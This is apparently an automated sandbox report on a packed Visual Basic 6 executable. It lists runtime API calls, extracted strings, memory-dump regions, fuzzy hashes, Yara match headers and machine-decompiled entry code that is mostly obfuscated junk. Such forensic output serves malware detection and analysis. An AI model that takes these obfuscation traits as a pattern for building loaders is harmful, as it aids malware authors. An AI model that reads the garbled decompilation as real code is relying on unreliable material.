__vbaNew2.MSVBVM60(0040398C,0043039C,?,?,?,?,?,?,?,004013A6), ref: 0042D30D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040397C,00000014), ref: 0042D372
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042D3D4
__vbaStrMove.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042D404
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042D40F
#539.MSVBVM60(?,00000001,00000001,00000001), ref: 0042D428
__vbaStrVarMove.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042D434
__vbaStrMove.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042D43E
__vbaFreeVar.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042D449
__vbaNew2.MSVBVM60(0040398C,0043039C,?,?,00000001,00000001,00000001), ref: 0042D468
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040397C,00000014), ref: 0042D4CD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,000000F0), ref: 0042D52F
__vbaStrMove.MSVBVM60(00000000,?,0040399C,000000F0), ref: 0042D562
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,000000F0), ref: 0042D56D
__vbaFpI4.MSVBVM60(00000000,?,0040399C,000000F0), ref: 0042D57F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004034B4,00000064), ref: 0042D5B1
__vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,?,004013A6), ref: 0042D5D7
__vbaNew2.MSVBVM60(0040398C,0043039C), ref: 0042D606
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040397C,00000014), ref: 0042D66B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,000000B8), ref: 0042D6CD
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,000000B8), ref: 0042D6F2
#611.MSVBVM60(00000000,?,0040399C,000000B8), ref: 0042D6FE
__vbaStrMove.MSVBVM60(00000000,?,0040399C,000000B8), ref: 0042D70B
#598.MSVBVM60(00000000,?,0040399C,000000B8), ref: 0042D717
__vbaNew2.MSVBVM60(0040398C,0043039C), ref: 0042D736
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040397C,0000001C), ref: 0042D79B
__vbaHresultCheckObj.MSVBVM60(00000000,?,004039D4,00000050), ref: 0042D7F0
__vbaFreeObj.MSVBVM60(00000000,?,004039D4,00000050), ref: 0042D80A
__vbaStrCat.MSVBVM60(00403AB4,00403AAC), ref: 0042D820
__vbaStrMove.MSVBVM60(00403AB4,00403AAC), ref: 0042D82D
__vbaI4Str.MSVBVM60(00000000,00403AB4,00403AAC), ref: 0042D833
#537.MSVBVM60(00000000,00000000,00403AB4,00403AAC), ref: 0042D839
__vbaStrMove.MSVBVM60(00000000,00000000,00403AB4,00403AAC), ref: 0042D846
__vbaStrCmp.MSVBVM60(00403ABC,00000000,00000000,00000000,00403AB4,00403AAC), ref: 0042D851
__vbaFreeStrList.MSVBVM60(00000002,?,?,00403ABC,00000000,00000000,00000000,00403AB4,00403AAC), ref: 0042D875
#611.MSVBVM60(?,?,?,?,?,?,?,?,?,?,004013A6), ref: 0042D893
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,004013A6), ref: 0042D89D
#704.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0042D8C9
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0042D8D3
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0042D8DE
#536.MSVBVM60(00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0042D905
__vbaStrMove.MSVBVM60(00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0042D90F
__vbaFreeVar.MSVBVM60(00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0042D91A
#570.MSVBVM60(0000007B,00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0042D92F
__vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,004013A6), ref: 0042D94C
__vbaNew2.MSVBVM60(0040398C,0043039C), ref: 0042D97B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040397C,00000014), ref: 0042D9E0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,000000B8), ref: 0042DA42
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,000000B8), ref: 0042DA6A
#611.MSVBVM60(00000000,?,0040399C,000000B8), ref: 0042DA76
__vbaStrMove.MSVBVM60(00000000,?,0040399C,000000B8), ref: 0042DA80
#598.MSVBVM60(00000000,?,0040399C,000000B8), ref: 0042DA8C
__vbaNew2.MSVBVM60(0040398C,0043039C), ref: 0042DAAB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040397C,0000001C), ref: 0042DB10
__vbaHresultCheckObj.MSVBVM60(00000000,?,004039D4,00000050), ref: 0042DB65
__vbaFreeObj.MSVBVM60(00000000,?,004039D4,00000050), ref: 0042DB7F
__vbaSetSystemError.MSVBVM60 ref: 0042DB96
__vbaNew2.MSVBVM60(0040398C,0043039C), ref: 0042DBC5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040397C,00000014), ref: 0042DC2A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,000000B8), ref: 0042DC8C
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,000000B8), ref: 0042DCB1
#611.MSVBVM60(00000000,?,0040399C,000000B8), ref: 0042DCBD
__vbaStrMove.MSVBVM60(00000000,?,0040399C,000000B8), ref: 0042DCCA
#598.MSVBVM60(00000000,?,0040399C,000000B8), ref: 0042DCD6
__vbaNew2.MSVBVM60(0040398C,0043039C), ref: 0042DCF5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040397C,0000001C), ref: 0042DD5A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004039D4,00000050), ref: 0042DDAF
__vbaFreeObj.MSVBVM60(00000000,?,004039D4,00000050), ref: 0042DDC9
__vbaStrCopy.MSVBVM60 ref: 0042DDEC
__vbaFreeStr.MSVBVM60 ref: 0042DE60
__vbaStrCopy.MSVBVM60 ref: 0042DE9C
__vbaHresultCheckObj.MSVBVM60(00000000,?,004034E4,000006FC), ref: 0042DF01
__vbaFreeStr.MSVBVM60(00000000,?,004034E4,000006FC), ref: 0042DF27

Strings

Hvalrostand, xrefs: 0042DE91
elektronikeren, xrefs: 0042DDE1
milksop, xrefs: 0042DE13
v0, xrefs: 0042EEF0
SYLFIDENS, xrefs: 0042CF5F
-10-, xrefs: 0042F0EA
Austrogaean3, xrefs: 0042D1D5
ABILDGRAAT, xrefs: 0042DEC5
/, xrefs: 0042DF54

Memory Dump Source

Source File: 00000001.00000002.1300993047.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1300947769.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1301772553.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1301841364.0000000000432000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1302501500.0000000000473000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$Move$New2$#611$#598ErrorListSystem$Copy$#531#536#537#539#542#570#704Chkstk
String ID: -10-$/$ABILDGRAAT$Austrogaean3$Hvalrostand$SYLFIDENS$elektronikeren$milksop$v0
API String ID: 3053149553-1130596020
Opcode ID: 9681fa0cc00db675b47a266f6b558bb7180c7ba768c7ae03e7f2cdcf5c8ec85b
Instruction ID: 9573f704782a9446ba78c8fb62b04fb03fadd54eb05aabf694fabb64ab2e83d7
Opcode Fuzzy Hash: 9681fa0cc00db675b47a266f6b558bb7180c7ba768c7ae03e7f2cdcf5c8ec85b
Instruction Fuzzy Hash: E3D20B70900228AFDB20EF51CC45BDDBBB4BF08305F5085EAE50ABB1A1DB785A85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004015BC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 73%

			_entry_() {
				signed char _t53;
				signed char _t54;
				signed int _t56;
				signed int _t57;
				signed char _t58;
				signed char _t59;
				signed int _t61;
				signed char _t62;
				void* _t67;
				signed char _t68;
				signed char _t73;
				void* _t75;
				intOrPtr* _t76;
				void* _t77;
				intOrPtr* _t78;
				void* _t79;
				void* _t83;

				_push("VB5!6&*"); // executed
				L004015B6(); // executed
				 *_t53 =  *_t53 + _t53;
				 *_t53 =  *_t53 + _t53;
				 *_t53 =  *_t53 + _t53;
				 *_t53 =  *_t53 ^ _t53;
				 *_t53 =  *_t53 + _t53;
				_t54 = _t53 + 1;
				 *_t54 =  *_t54 + _t54;
				 *_t54 =  *_t54 + _t54;
				 *_t54 =  *_t54 + _t54;
				 *((intOrPtr*)(_t75 + 0x6a214ed7)) =  *((intOrPtr*)(_t75 + 0x6a214ed7)) + _t54;
				_t3 = _t79 + 0x48;
				 *_t3 =  *(_t79 + 0x48) >> _t68;
				if( *_t3 < 0) {
					_t68 = _t68 + 1;
					 *_t54 =  *_t54 + _t54;
					 *_t54 =  *_t54 + _t54;
					_t61 = _t61 + _t61;
					asm("int3");
					 *_t54 =  *_t54 ^ _t54;
					asm("in al, dx");
					asm("out 0x9d, eax");
					asm("sahf");
					_t54 = _t54 | 0x00000041 |  *(_t75 - 0x4d);
					asm("cmpsd");
					asm("adc [edx-0x2e], edi");
					_t78 = _t78 + 1;
					asm("wait");
					if(_t78 <= 0) {
						L2:
						asm("invalid");
						_t68 = _t68 +  *((intOrPtr*)(_t61 + 0x75));
						asm("insb");
					}
					 *(_t68 + 0x44c5f4ef) =  *(_t68 + 0x44c5f4ef) | _t68;
					_t56 = _t61;
					_t62 = _t54;
					 *0x33ad4f3a = _t56;
					asm("cdq");
					asm("iretw");
					asm("adc [edi+0xaa000c], esi");
					asm("pushad");
					asm("rcl dword [ebx], cl");
					 *_t56 =  *_t56 + _t56;
					 *_t56 =  *_t56 + _t56;
					 *_t56 =  *_t56 + _t56;
					 *_t56 =  *_t56 + _t56;
					 *_t56 =  *_t56 + _t56;
					 *_t56 =  *_t56 + _t56;
					 *_t56 =  *_t56 + _t56;
					 *_t56 =  *_t56 + _t56;
					 *_t56 =  *_t56 + _t56;
					 *_t56 =  *_t56 + _t56;
					 *_t56 =  *_t56 + _t56;
					 *_t56 =  *_t56 + _t56;
					 *_t56 =  *_t56 + _t56;
					 *_t56 =  *_t56 + _t56;
					 *_t56 =  *_t56 + _t56;
					 *_t56 =  *_t56 + _t56;
					_push(_t83);
					asm("adc [eax], al");
					 *_t56 =  *_t56 + _t56;
					 *_t56 =  *_t56 + _t56;
					 *0x49 =  *0x49 + 0xf3;
					 *((intOrPtr*)(_t62 + 0x61)) =  *((intOrPtr*)(_t62 + 0x61)) + 0x49;
					asm("outsb");
					asm("a16 gs outsb");
					asm("arpl [edi+0x61], bp");
					_t57 = _t56 ^ 0x05010d00;
					 *0x00000141 =  *((intOrPtr*)(0x141)) + _t57;
					_push(_t62);
					_t76 = _t75 + 1;
					 *0x000000F2 =  *0x000000F2 + _t62;
					 *_t57 =  *_t57 + _t57;
					 *0x0000004A =  *((intOrPtr*)(0x4a)) + _t57;
					 *_t62 =  *_t62 + _t83;
					 *_t57 =  *_t57 + _t57;
					asm("insb");
					if ( *_t57 == 0) goto L7;
					 *_t78 =  *_t78 + 0x4a;
					 *_t57 =  *_t57 + _t57;
					 *_t57 =  *_t57 + _t57;
					 *_t57 =  *_t57 + _t57;
					_t58 = _t57 +  *_t57;
					 *_t58 =  *_t58 & _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 | _t58;
					 *_t58 =  *_t58 + _t58;
					 *[es:eax] =  *[es:eax] + _t58;
					 *_t58 =  *_t58 + 0x4a;
					asm("adc [eax], al");
					 *0x000000F2 =  *0x000000F2 + _t58;
					 *_t58 = 0xf2 +  *_t58;
					 *((intOrPtr*)(_t58 + 5)) =  *((intOrPtr*)(_t58 + 5)) + 0xf2;
					 *_t58 =  *_t58 + _t58;
					asm("into");
					 *_t58 =  *_t58 | _t58;
					 *_t58 = 0xf2 +  *_t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 | _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + _t58;
					 *((char*)(_t58 + _t58)) =  *((char*)(_t58 + _t58));
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + _t58;
					 *0x000000F2 =  *0x000000F2 + _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58;
					 *_t58 =  *_t58;
					 *((intOrPtr*)(_t58 + 0x800080)) =  *((intOrPtr*)(_t58 + 0x800080)) + _t58;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + 0x80;
					 *((intOrPtr*)(_t58 - 0x3fffff80)) =  *((intOrPtr*)(_t58 - 0x3fffff80)) + _t58;
					asm("rol al, 0x0");
					 *((char*)(_t58 + 0x80)) =  *((char*)(_t58 + 0x80)) + 0xff;
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + 1;
					 *_t58 =  *_t58 + _t58;
					asm("invalid");
					 *_t58 =  *_t58 + _t58;
					 *_t58 =  *_t58 + 1;
					_t67 = _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62 + _t62;
					asm("invalid");
					 *0x000000F2 = 0xf2 +  *0x000000F2;
					 *0x000000F2 =  *0x000000F2 | 0xf2;
					 *((intOrPtr*)(0x4a)) =  *((intOrPtr*)(0x4a)) + 0x4a;
					asm("adc dl, [edx]");
					 *_t76 =  *_t76 + _t67;
					ds = cs;
					ds = cs;
					 *((intOrPtr*)(_t83 + _t79)) =  *((intOrPtr*)(_t83 + _t79)) + 0xf2;
					_t59 = _t58;
					 *0x0000009C =  *((intOrPtr*)(0x9c)) + 0x4a;
					_push(0x4a);
					 *((intOrPtr*)(_t76 + 0x5f)) =  *((intOrPtr*)(_t76 + 0x5f)) + _t67;
					_pop(_t77);
					 *((intOrPtr*)(_t83 + 0x6c + (_t79 + 3) * 2)) =  *((intOrPtr*)(_t83 + 0x6c + (_t79 + 3) * 2)) + 0xf2;
					_t43 = _t59 + 0x78;
					 *_t43 =  *((intOrPtr*)(_t59 + 0x78)) + _t67;
					if ( *_t43 < 0) goto L8;
					_t73 = _t59;
					 *((intOrPtr*)(_t77 - 0x54ff6061)) =  *((intOrPtr*)(_t77 - 0x54ff6061)) + _t67;
					asm("stosd");
					L9:
					asm("stosd");
					 *0xFFFFFFFFC500B902 =  *((intOrPtr*)(0xffffffffc500b902)) + _t67;
					asm("invalid");
					asm("rcl dl, cl");
					_t73 = _t73 + _t73 + _t67;
					asm("invalid");
					_t67 = _t67 + 0xf2;
					goto L9;
				}
				asm("invalid");
				asm("lodsb");
				 *_t54 =  *_t54 + _t54;
				 *_t54 =  *_t54 + _t54;
				 *_t54 =  *_t54 + _t54;
				 *_t54 =  *_t54 + _t54;
				 *_t54 =  *_t54 + _t54;
				 *_t54 =  *_t54 + _t54;
				_t54 = 0x8f;
				goto L2;
			}

0x004015bc
0x004015c1
0x004015c6
0x004015c8
0x004015ca
0x004015cc
0x004015ce
0x004015d0
0x004015d1
0x004015d3
0x004015d5
0x004015d7
0x004015dd
0x004015dd
0x004015e2
0x00401606
0x00401607
0x00401609
0x0040160b
0x0040160d
0x0040160e
0x00401612
0x00401613
0x00401615
0x00401617
0x0040161a
0x0040161b
0x0040161e
0x0040161f
0x00401621
0x004015f5
0x004015f5
0x004015f7
0x004015fa
0x004015fa
0x00401623
0x0040162b
0x0040162b
0x00401630
0x00401635
0x00401636
0x00401638
0x0040163e
0x0040163f
0x00401645
0x00401647
0x00401649
0x0040164b
0x0040164d
0x0040164f
0x00401651
0x00401653
0x00401655
0x00401657
0x00401659
0x0040165b
0x0040165d
0x0040165f
0x00401661
0x00401663
0x00401665
0x00401666
0x00401667
0x0040166b
0x0040166d
0x0040166f
0x00401672
0x00401673
0x00401676
0x00401679
0x0040167e
0x00401681
0x00401683
0x00401684
0x00401686
0x00401689
0x0040168b
0x0040168f
0x00401691
0x00401692
0x00401694
0x00401697
0x00401699
0x0040169b
0x0040169d
0x0040169f
0x004016a1
0x004016a3
0x004016a5
0x004016a9
0x004016ab
0x004016ae
0x004016b0
0x004016b2
0x004016b4
0x004016b6
0x004016b9
0x004016bb
0x004016bc
0x004016be
0x004016c0
0x004016c2
0x004016c4
0x004016c6
0x004016c9
0x004016cb
0x004016cd
0x004016cf
0x004016d1
0x004016d3
0x004016d7
0x004016d9
0x004016db
0x004016dd
0x004016df
0x004016e1
0x004016e3
0x004016e5
0x004016e7
0x004016e9
0x004016eb
0x004016ed
0x004016f0
0x004016f3
0x004016f9
0x004016fb
0x004016fe
0x00401704
0x00401707
0x0040170e
0x00401710
0x00401712
0x00401714
0x00401718
0x00401720
0x00401722
0x00401724
0x00401726
0x00401728
0x0040172a
0x0040172c
0x0040172e
0x00401730
0x00401731
0x00401732
0x00401735
0x0040173e
0x00401741
0x00401742
0x00401745
0x00401746
0x0040174a
0x0040174a
0x0040174d
0x00401755
0x00401756
0x0040175c
0x0040175d
0x0040175d
0x0040175e
0x00401764
0x00401768
0x0040176a
0x0040176c
0x0040176e
0x00000000
0x0040176e
0x004015e4
0x004015e7
0x004015e8
0x004015ea
0x004015ec
0x004015ee
0x004015f0
0x004015f2
0x004015f4
0x00000000

APIs

#100.MSVBVM60(VB5!6&*), ref: 004015C1

Strings

VB5!6&*, xrefs: 004015BC

Memory Dump Source

Source File: 00000001.00000002.1300993047.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1300947769.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1301772553.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1301841364.0000000000432000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1302501500.0000000000473000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 1d0d04d0404642e5ff7a44ced5c493b44ba8de2fce4c898ac3752dbd1a3b9abe
Instruction ID: 2a5778685384b7196082f20862d814ddbea10ece043f128a3edb852ac32da917
Opcode Fuzzy Hash: 1d0d04d0404642e5ff7a44ced5c493b44ba8de2fce4c898ac3752dbd1a3b9abe
Instruction Fuzzy Hash: B25142A144E7C15FC3035BB49C652957FB0AE23228B1E06EBC5C0CF0F3E269095AD722

Uniqueness

Uniqueness Score: -1.00%

Function 00403914, Relevance: 1.3, Strings: 1, Instructions: 8COMMON

Download Yara Rule

Strings

@8@, xrefs: 0040391F

Memory Dump Source

Source File: 00000001.00000002.1300993047.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1300947769.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1301772553.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1301841364.0000000000432000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1302501500.0000000000473000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: @8@
API String ID: 0-4002982329
Opcode ID: 4b20f67c5f4853ad92112b5fae9707a4f70cbce8bab6a7839320699f00142512
Instruction ID: 7d94ae4bf9e6686b0e62ca8903539ad8ded7d6b7987f5f131a15180056ff973c
Opcode Fuzzy Hash: 4b20f67c5f4853ad92112b5fae9707a4f70cbce8bab6a7839320699f00142512
Instruction Fuzzy Hash: 87B012103942459FD2105B584C0252126D4E3807813604E33F441F21F0CB78CF00413D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0233523A, Relevance: 9.0, Strings: 6, Instructions: 1503COMMON

Download Yara Rule

Strings

9', xrefs: 0233879E
)!(q, xrefs: 02338B1D
3rWA, xrefs: 02335B33
4[+>, xrefs: 0233822D
\+S, xrefs: 023387AE
aE}E, xrefs: 02338BCD

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID: )!(q$3rWA$4[+>$9'$\+S$aE}E
API String ID: 0-194816297
Opcode ID: 9d08b7f7dadfe2d3a9c250c89bd452af791a1eff46c519049401b2f4d6f7b99d
Instruction ID: e595726d81972f3fad9521e3cb1cf46f7267c11060736ef1b2b1e557bb05d22a
Opcode Fuzzy Hash: 9d08b7f7dadfe2d3a9c250c89bd452af791a1eff46c519049401b2f4d6f7b99d
Instruction Fuzzy Hash: 09C21FB160074ADFDB348F28CD947DA77A6FF99350F85822ADC899B644D3309A86CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0233DFB4, Relevance: 7.2, Strings: 5, Instructions: 977COMMON

Download Yara Rule

Strings

9', xrefs: 0233879E
)!(q, xrefs: 02338B1D
4[+>, xrefs: 0233822D
\+S, xrefs: 023387AE
aE}E, xrefs: 02338BCD

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID: )!(q$4[+>$9'$\+S$aE}E
API String ID: 0-2724872629
Opcode ID: fe42f64120a820c3241160e6fa10fbe32a7652356ced8070332d74d3100e37e5
Instruction ID: c246e3b850f801287ab7c63071f69528cf1157610767758a8305aed4d13d5660
Opcode Fuzzy Hash: fe42f64120a820c3241160e6fa10fbe32a7652356ced8070332d74d3100e37e5
Instruction Fuzzy Hash: 497233B160034A9FDB349E38CDA57EA77B6FF95350F85812EDD8A9B640D3304A86CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02337904, Relevance: 7.1, Strings: 5, Instructions: 895COMMON

Download Yara Rule

Strings

9', xrefs: 0233879E
)!(q, xrefs: 02338B1D
4[+>, xrefs: 0233822D
\+S, xrefs: 023387AE
aE}E, xrefs: 02338BCD

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID: )!(q$4[+>$9'$\+S$aE}E
API String ID: 0-2724872629
Opcode ID: 632d5858b2726b32380d2d940c993d008273f6b92685ff325ec26e5689150bd6
Instruction ID: 1fceb30dae5d7dbc8e2601baee874a1ca64a807a40acddbbf87efa1c7fe96442
Opcode Fuzzy Hash: 632d5858b2726b32380d2d940c993d008273f6b92685ff325ec26e5689150bd6
Instruction Fuzzy Hash: CA7234B160034A9FDB349E28CD657EA77B6FF99350F85812EDC8A9B640D3304A86CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02337A74, Relevance: 7.1, Strings: 5, Instructions: 852COMMON

Download Yara Rule

Strings

9', xrefs: 0233879E
)!(q, xrefs: 02338B1D
4[+>, xrefs: 0233822D
\+S, xrefs: 023387AE
aE}E, xrefs: 02338BCD

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID: )!(q$4[+>$9'$\+S$aE}E
API String ID: 0-2724872629
Opcode ID: 622112deffb20cb79b0197fdb88230ce09591fbc22060dda861854bb90e06df3
Instruction ID: 710011bb32c1f78358c7234f4c71357ad6fe12ba4abe92a27723701502080d8f
Opcode Fuzzy Hash: 622112deffb20cb79b0197fdb88230ce09591fbc22060dda861854bb90e06df3
Instruction Fuzzy Hash: 4E6224B160034ADFDB359E28CD957EA77B6FF85350F85812EDD8A9B610D3308A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02337C1B, Relevance: 7.1, Strings: 5, Instructions: 808COMMON

Download Yara Rule

Strings

9', xrefs: 0233879E
)!(q, xrefs: 02338B1D
4[+>, xrefs: 0233822D
\+S, xrefs: 023387AE
aE}E, xrefs: 02338BCD

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID: )!(q$4[+>$9'$\+S$aE}E
API String ID: 0-2724872629
Opcode ID: 78e671a1ebb3bb7f7a7555e43140c148bf7196bda03735be6cc7279ff2c509ea
Instruction ID: 9db3c4bc1c45a02e39d556d75e386c602f7ac0f582287db7a58f89c8dbce0393
Opcode Fuzzy Hash: 78e671a1ebb3bb7f7a7555e43140c148bf7196bda03735be6cc7279ff2c509ea
Instruction Fuzzy Hash: 205235B16003499FDF359E28CDA57EA77B6FF85350F85812EDC8A9B614D7308A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02337B2E, Relevance: 7.0, Strings: 5, Instructions: 767COMMON

Download Yara Rule

Strings

9', xrefs: 0233879E
)!(q, xrefs: 02338B1D
4[+>, xrefs: 0233822D
\+S, xrefs: 023387AE
aE}E, xrefs: 02338BCD

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID: )!(q$4[+>$9'$\+S$aE}E
API String ID: 0-2724872629
Opcode ID: 273a5f6634a61d974179930ccfe2f67f6a0332f1911ea813179b88f505b7537e
Instruction ID: b74459e1efeda241947a55f4376c8ae72d6dbc107212b86623afa1ba5770b2bd
Opcode Fuzzy Hash: 273a5f6634a61d974179930ccfe2f67f6a0332f1911ea813179b88f505b7537e
Instruction Fuzzy Hash: C76230B160034ADFDB349F28C9A57DA77B6FF49350F85812EDC8A9B650D3348A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02337F10, Relevance: 7.0, Strings: 5, Instructions: 710COMMON

Download Yara Rule

Strings

9', xrefs: 0233879E
)!(q, xrefs: 02338B1D
4[+>, xrefs: 0233822D
\+S, xrefs: 023387AE
aE}E, xrefs: 02338BCD

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID: )!(q$4[+>$9'$\+S$aE}E
API String ID: 0-2724872629
Opcode ID: 75182989b82bdb12f11d3ee965c4367b1835700a69d36c040109724a1463de5c
Instruction ID: 8bdee7c6882d9a07e447e91e7fed8ffcd194b6600848fa1ed7ceabb46bd7e7eb
Opcode Fuzzy Hash: 75182989b82bdb12f11d3ee965c4367b1835700a69d36c040109724a1463de5c
Instruction Fuzzy Hash: EC4233B16003499FDB359E28DD557EA77B6FF85350F85812EEC8ADB610D3308A82CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02337E47, Relevance: 6.9, Strings: 5, Instructions: 648COMMON

Download Yara Rule

Strings

9', xrefs: 0233879E
)!(q, xrefs: 02338B1D
4[+>, xrefs: 0233822D
\+S, xrefs: 023387AE
aE}E, xrefs: 02338BCD

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID: )!(q$4[+>$9'$\+S$aE}E
API String ID: 0-2724872629
Opcode ID: 512f255b4fa5d4c743d2b1dac9eec5597bad5ee11d9cc364f4f5e4ec7d544ef3
Instruction ID: 82b4447e56f852aed50493098ba4f08044189dd1dde270d257f20cafe06879cd
Opcode Fuzzy Hash: 512f255b4fa5d4c743d2b1dac9eec5597bad5ee11d9cc364f4f5e4ec7d544ef3
Instruction Fuzzy Hash: AA422FB160034ADFDB348E28CD957DA77B6FF59350F85822EDC8A9B650D3348A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02338149, Relevance: 6.8, Strings: 5, Instructions: 551COMMON

Download Yara Rule

Strings

9', xrefs: 0233879E
)!(q, xrefs: 02338B1D
4[+>, xrefs: 0233822D
\+S, xrefs: 023387AE
aE}E, xrefs: 02338BCD

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID: )!(q$4[+>$9'$\+S$aE}E
API String ID: 0-2724872629
Opcode ID: 067dcbbcf6df73ac1507b0b53f74ab2ff3f7a0ff02b60671e40d200f678bdadc
Instruction ID: 571d73d049310b250ae06ee2e6470e67ec9d7ed5c827d7bbb25a4d46e6cec9b1
Opcode Fuzzy Hash: 067dcbbcf6df73ac1507b0b53f74ab2ff3f7a0ff02b60671e40d200f678bdadc
Instruction Fuzzy Hash: 622220B1600749DFDB349E28CDA57EA77B6FF59350F85812EDC8A9B610D3308A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0233812F, Relevance: 6.8, Strings: 5, Instructions: 548COMMON

Download Yara Rule

Strings

9', xrefs: 0233879E
)!(q, xrefs: 02338B1D
4[+>, xrefs: 0233822D
\+S, xrefs: 023387AE
aE}E, xrefs: 02338BCD

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID: )!(q$4[+>$9'$\+S$aE}E
API String ID: 0-2724872629
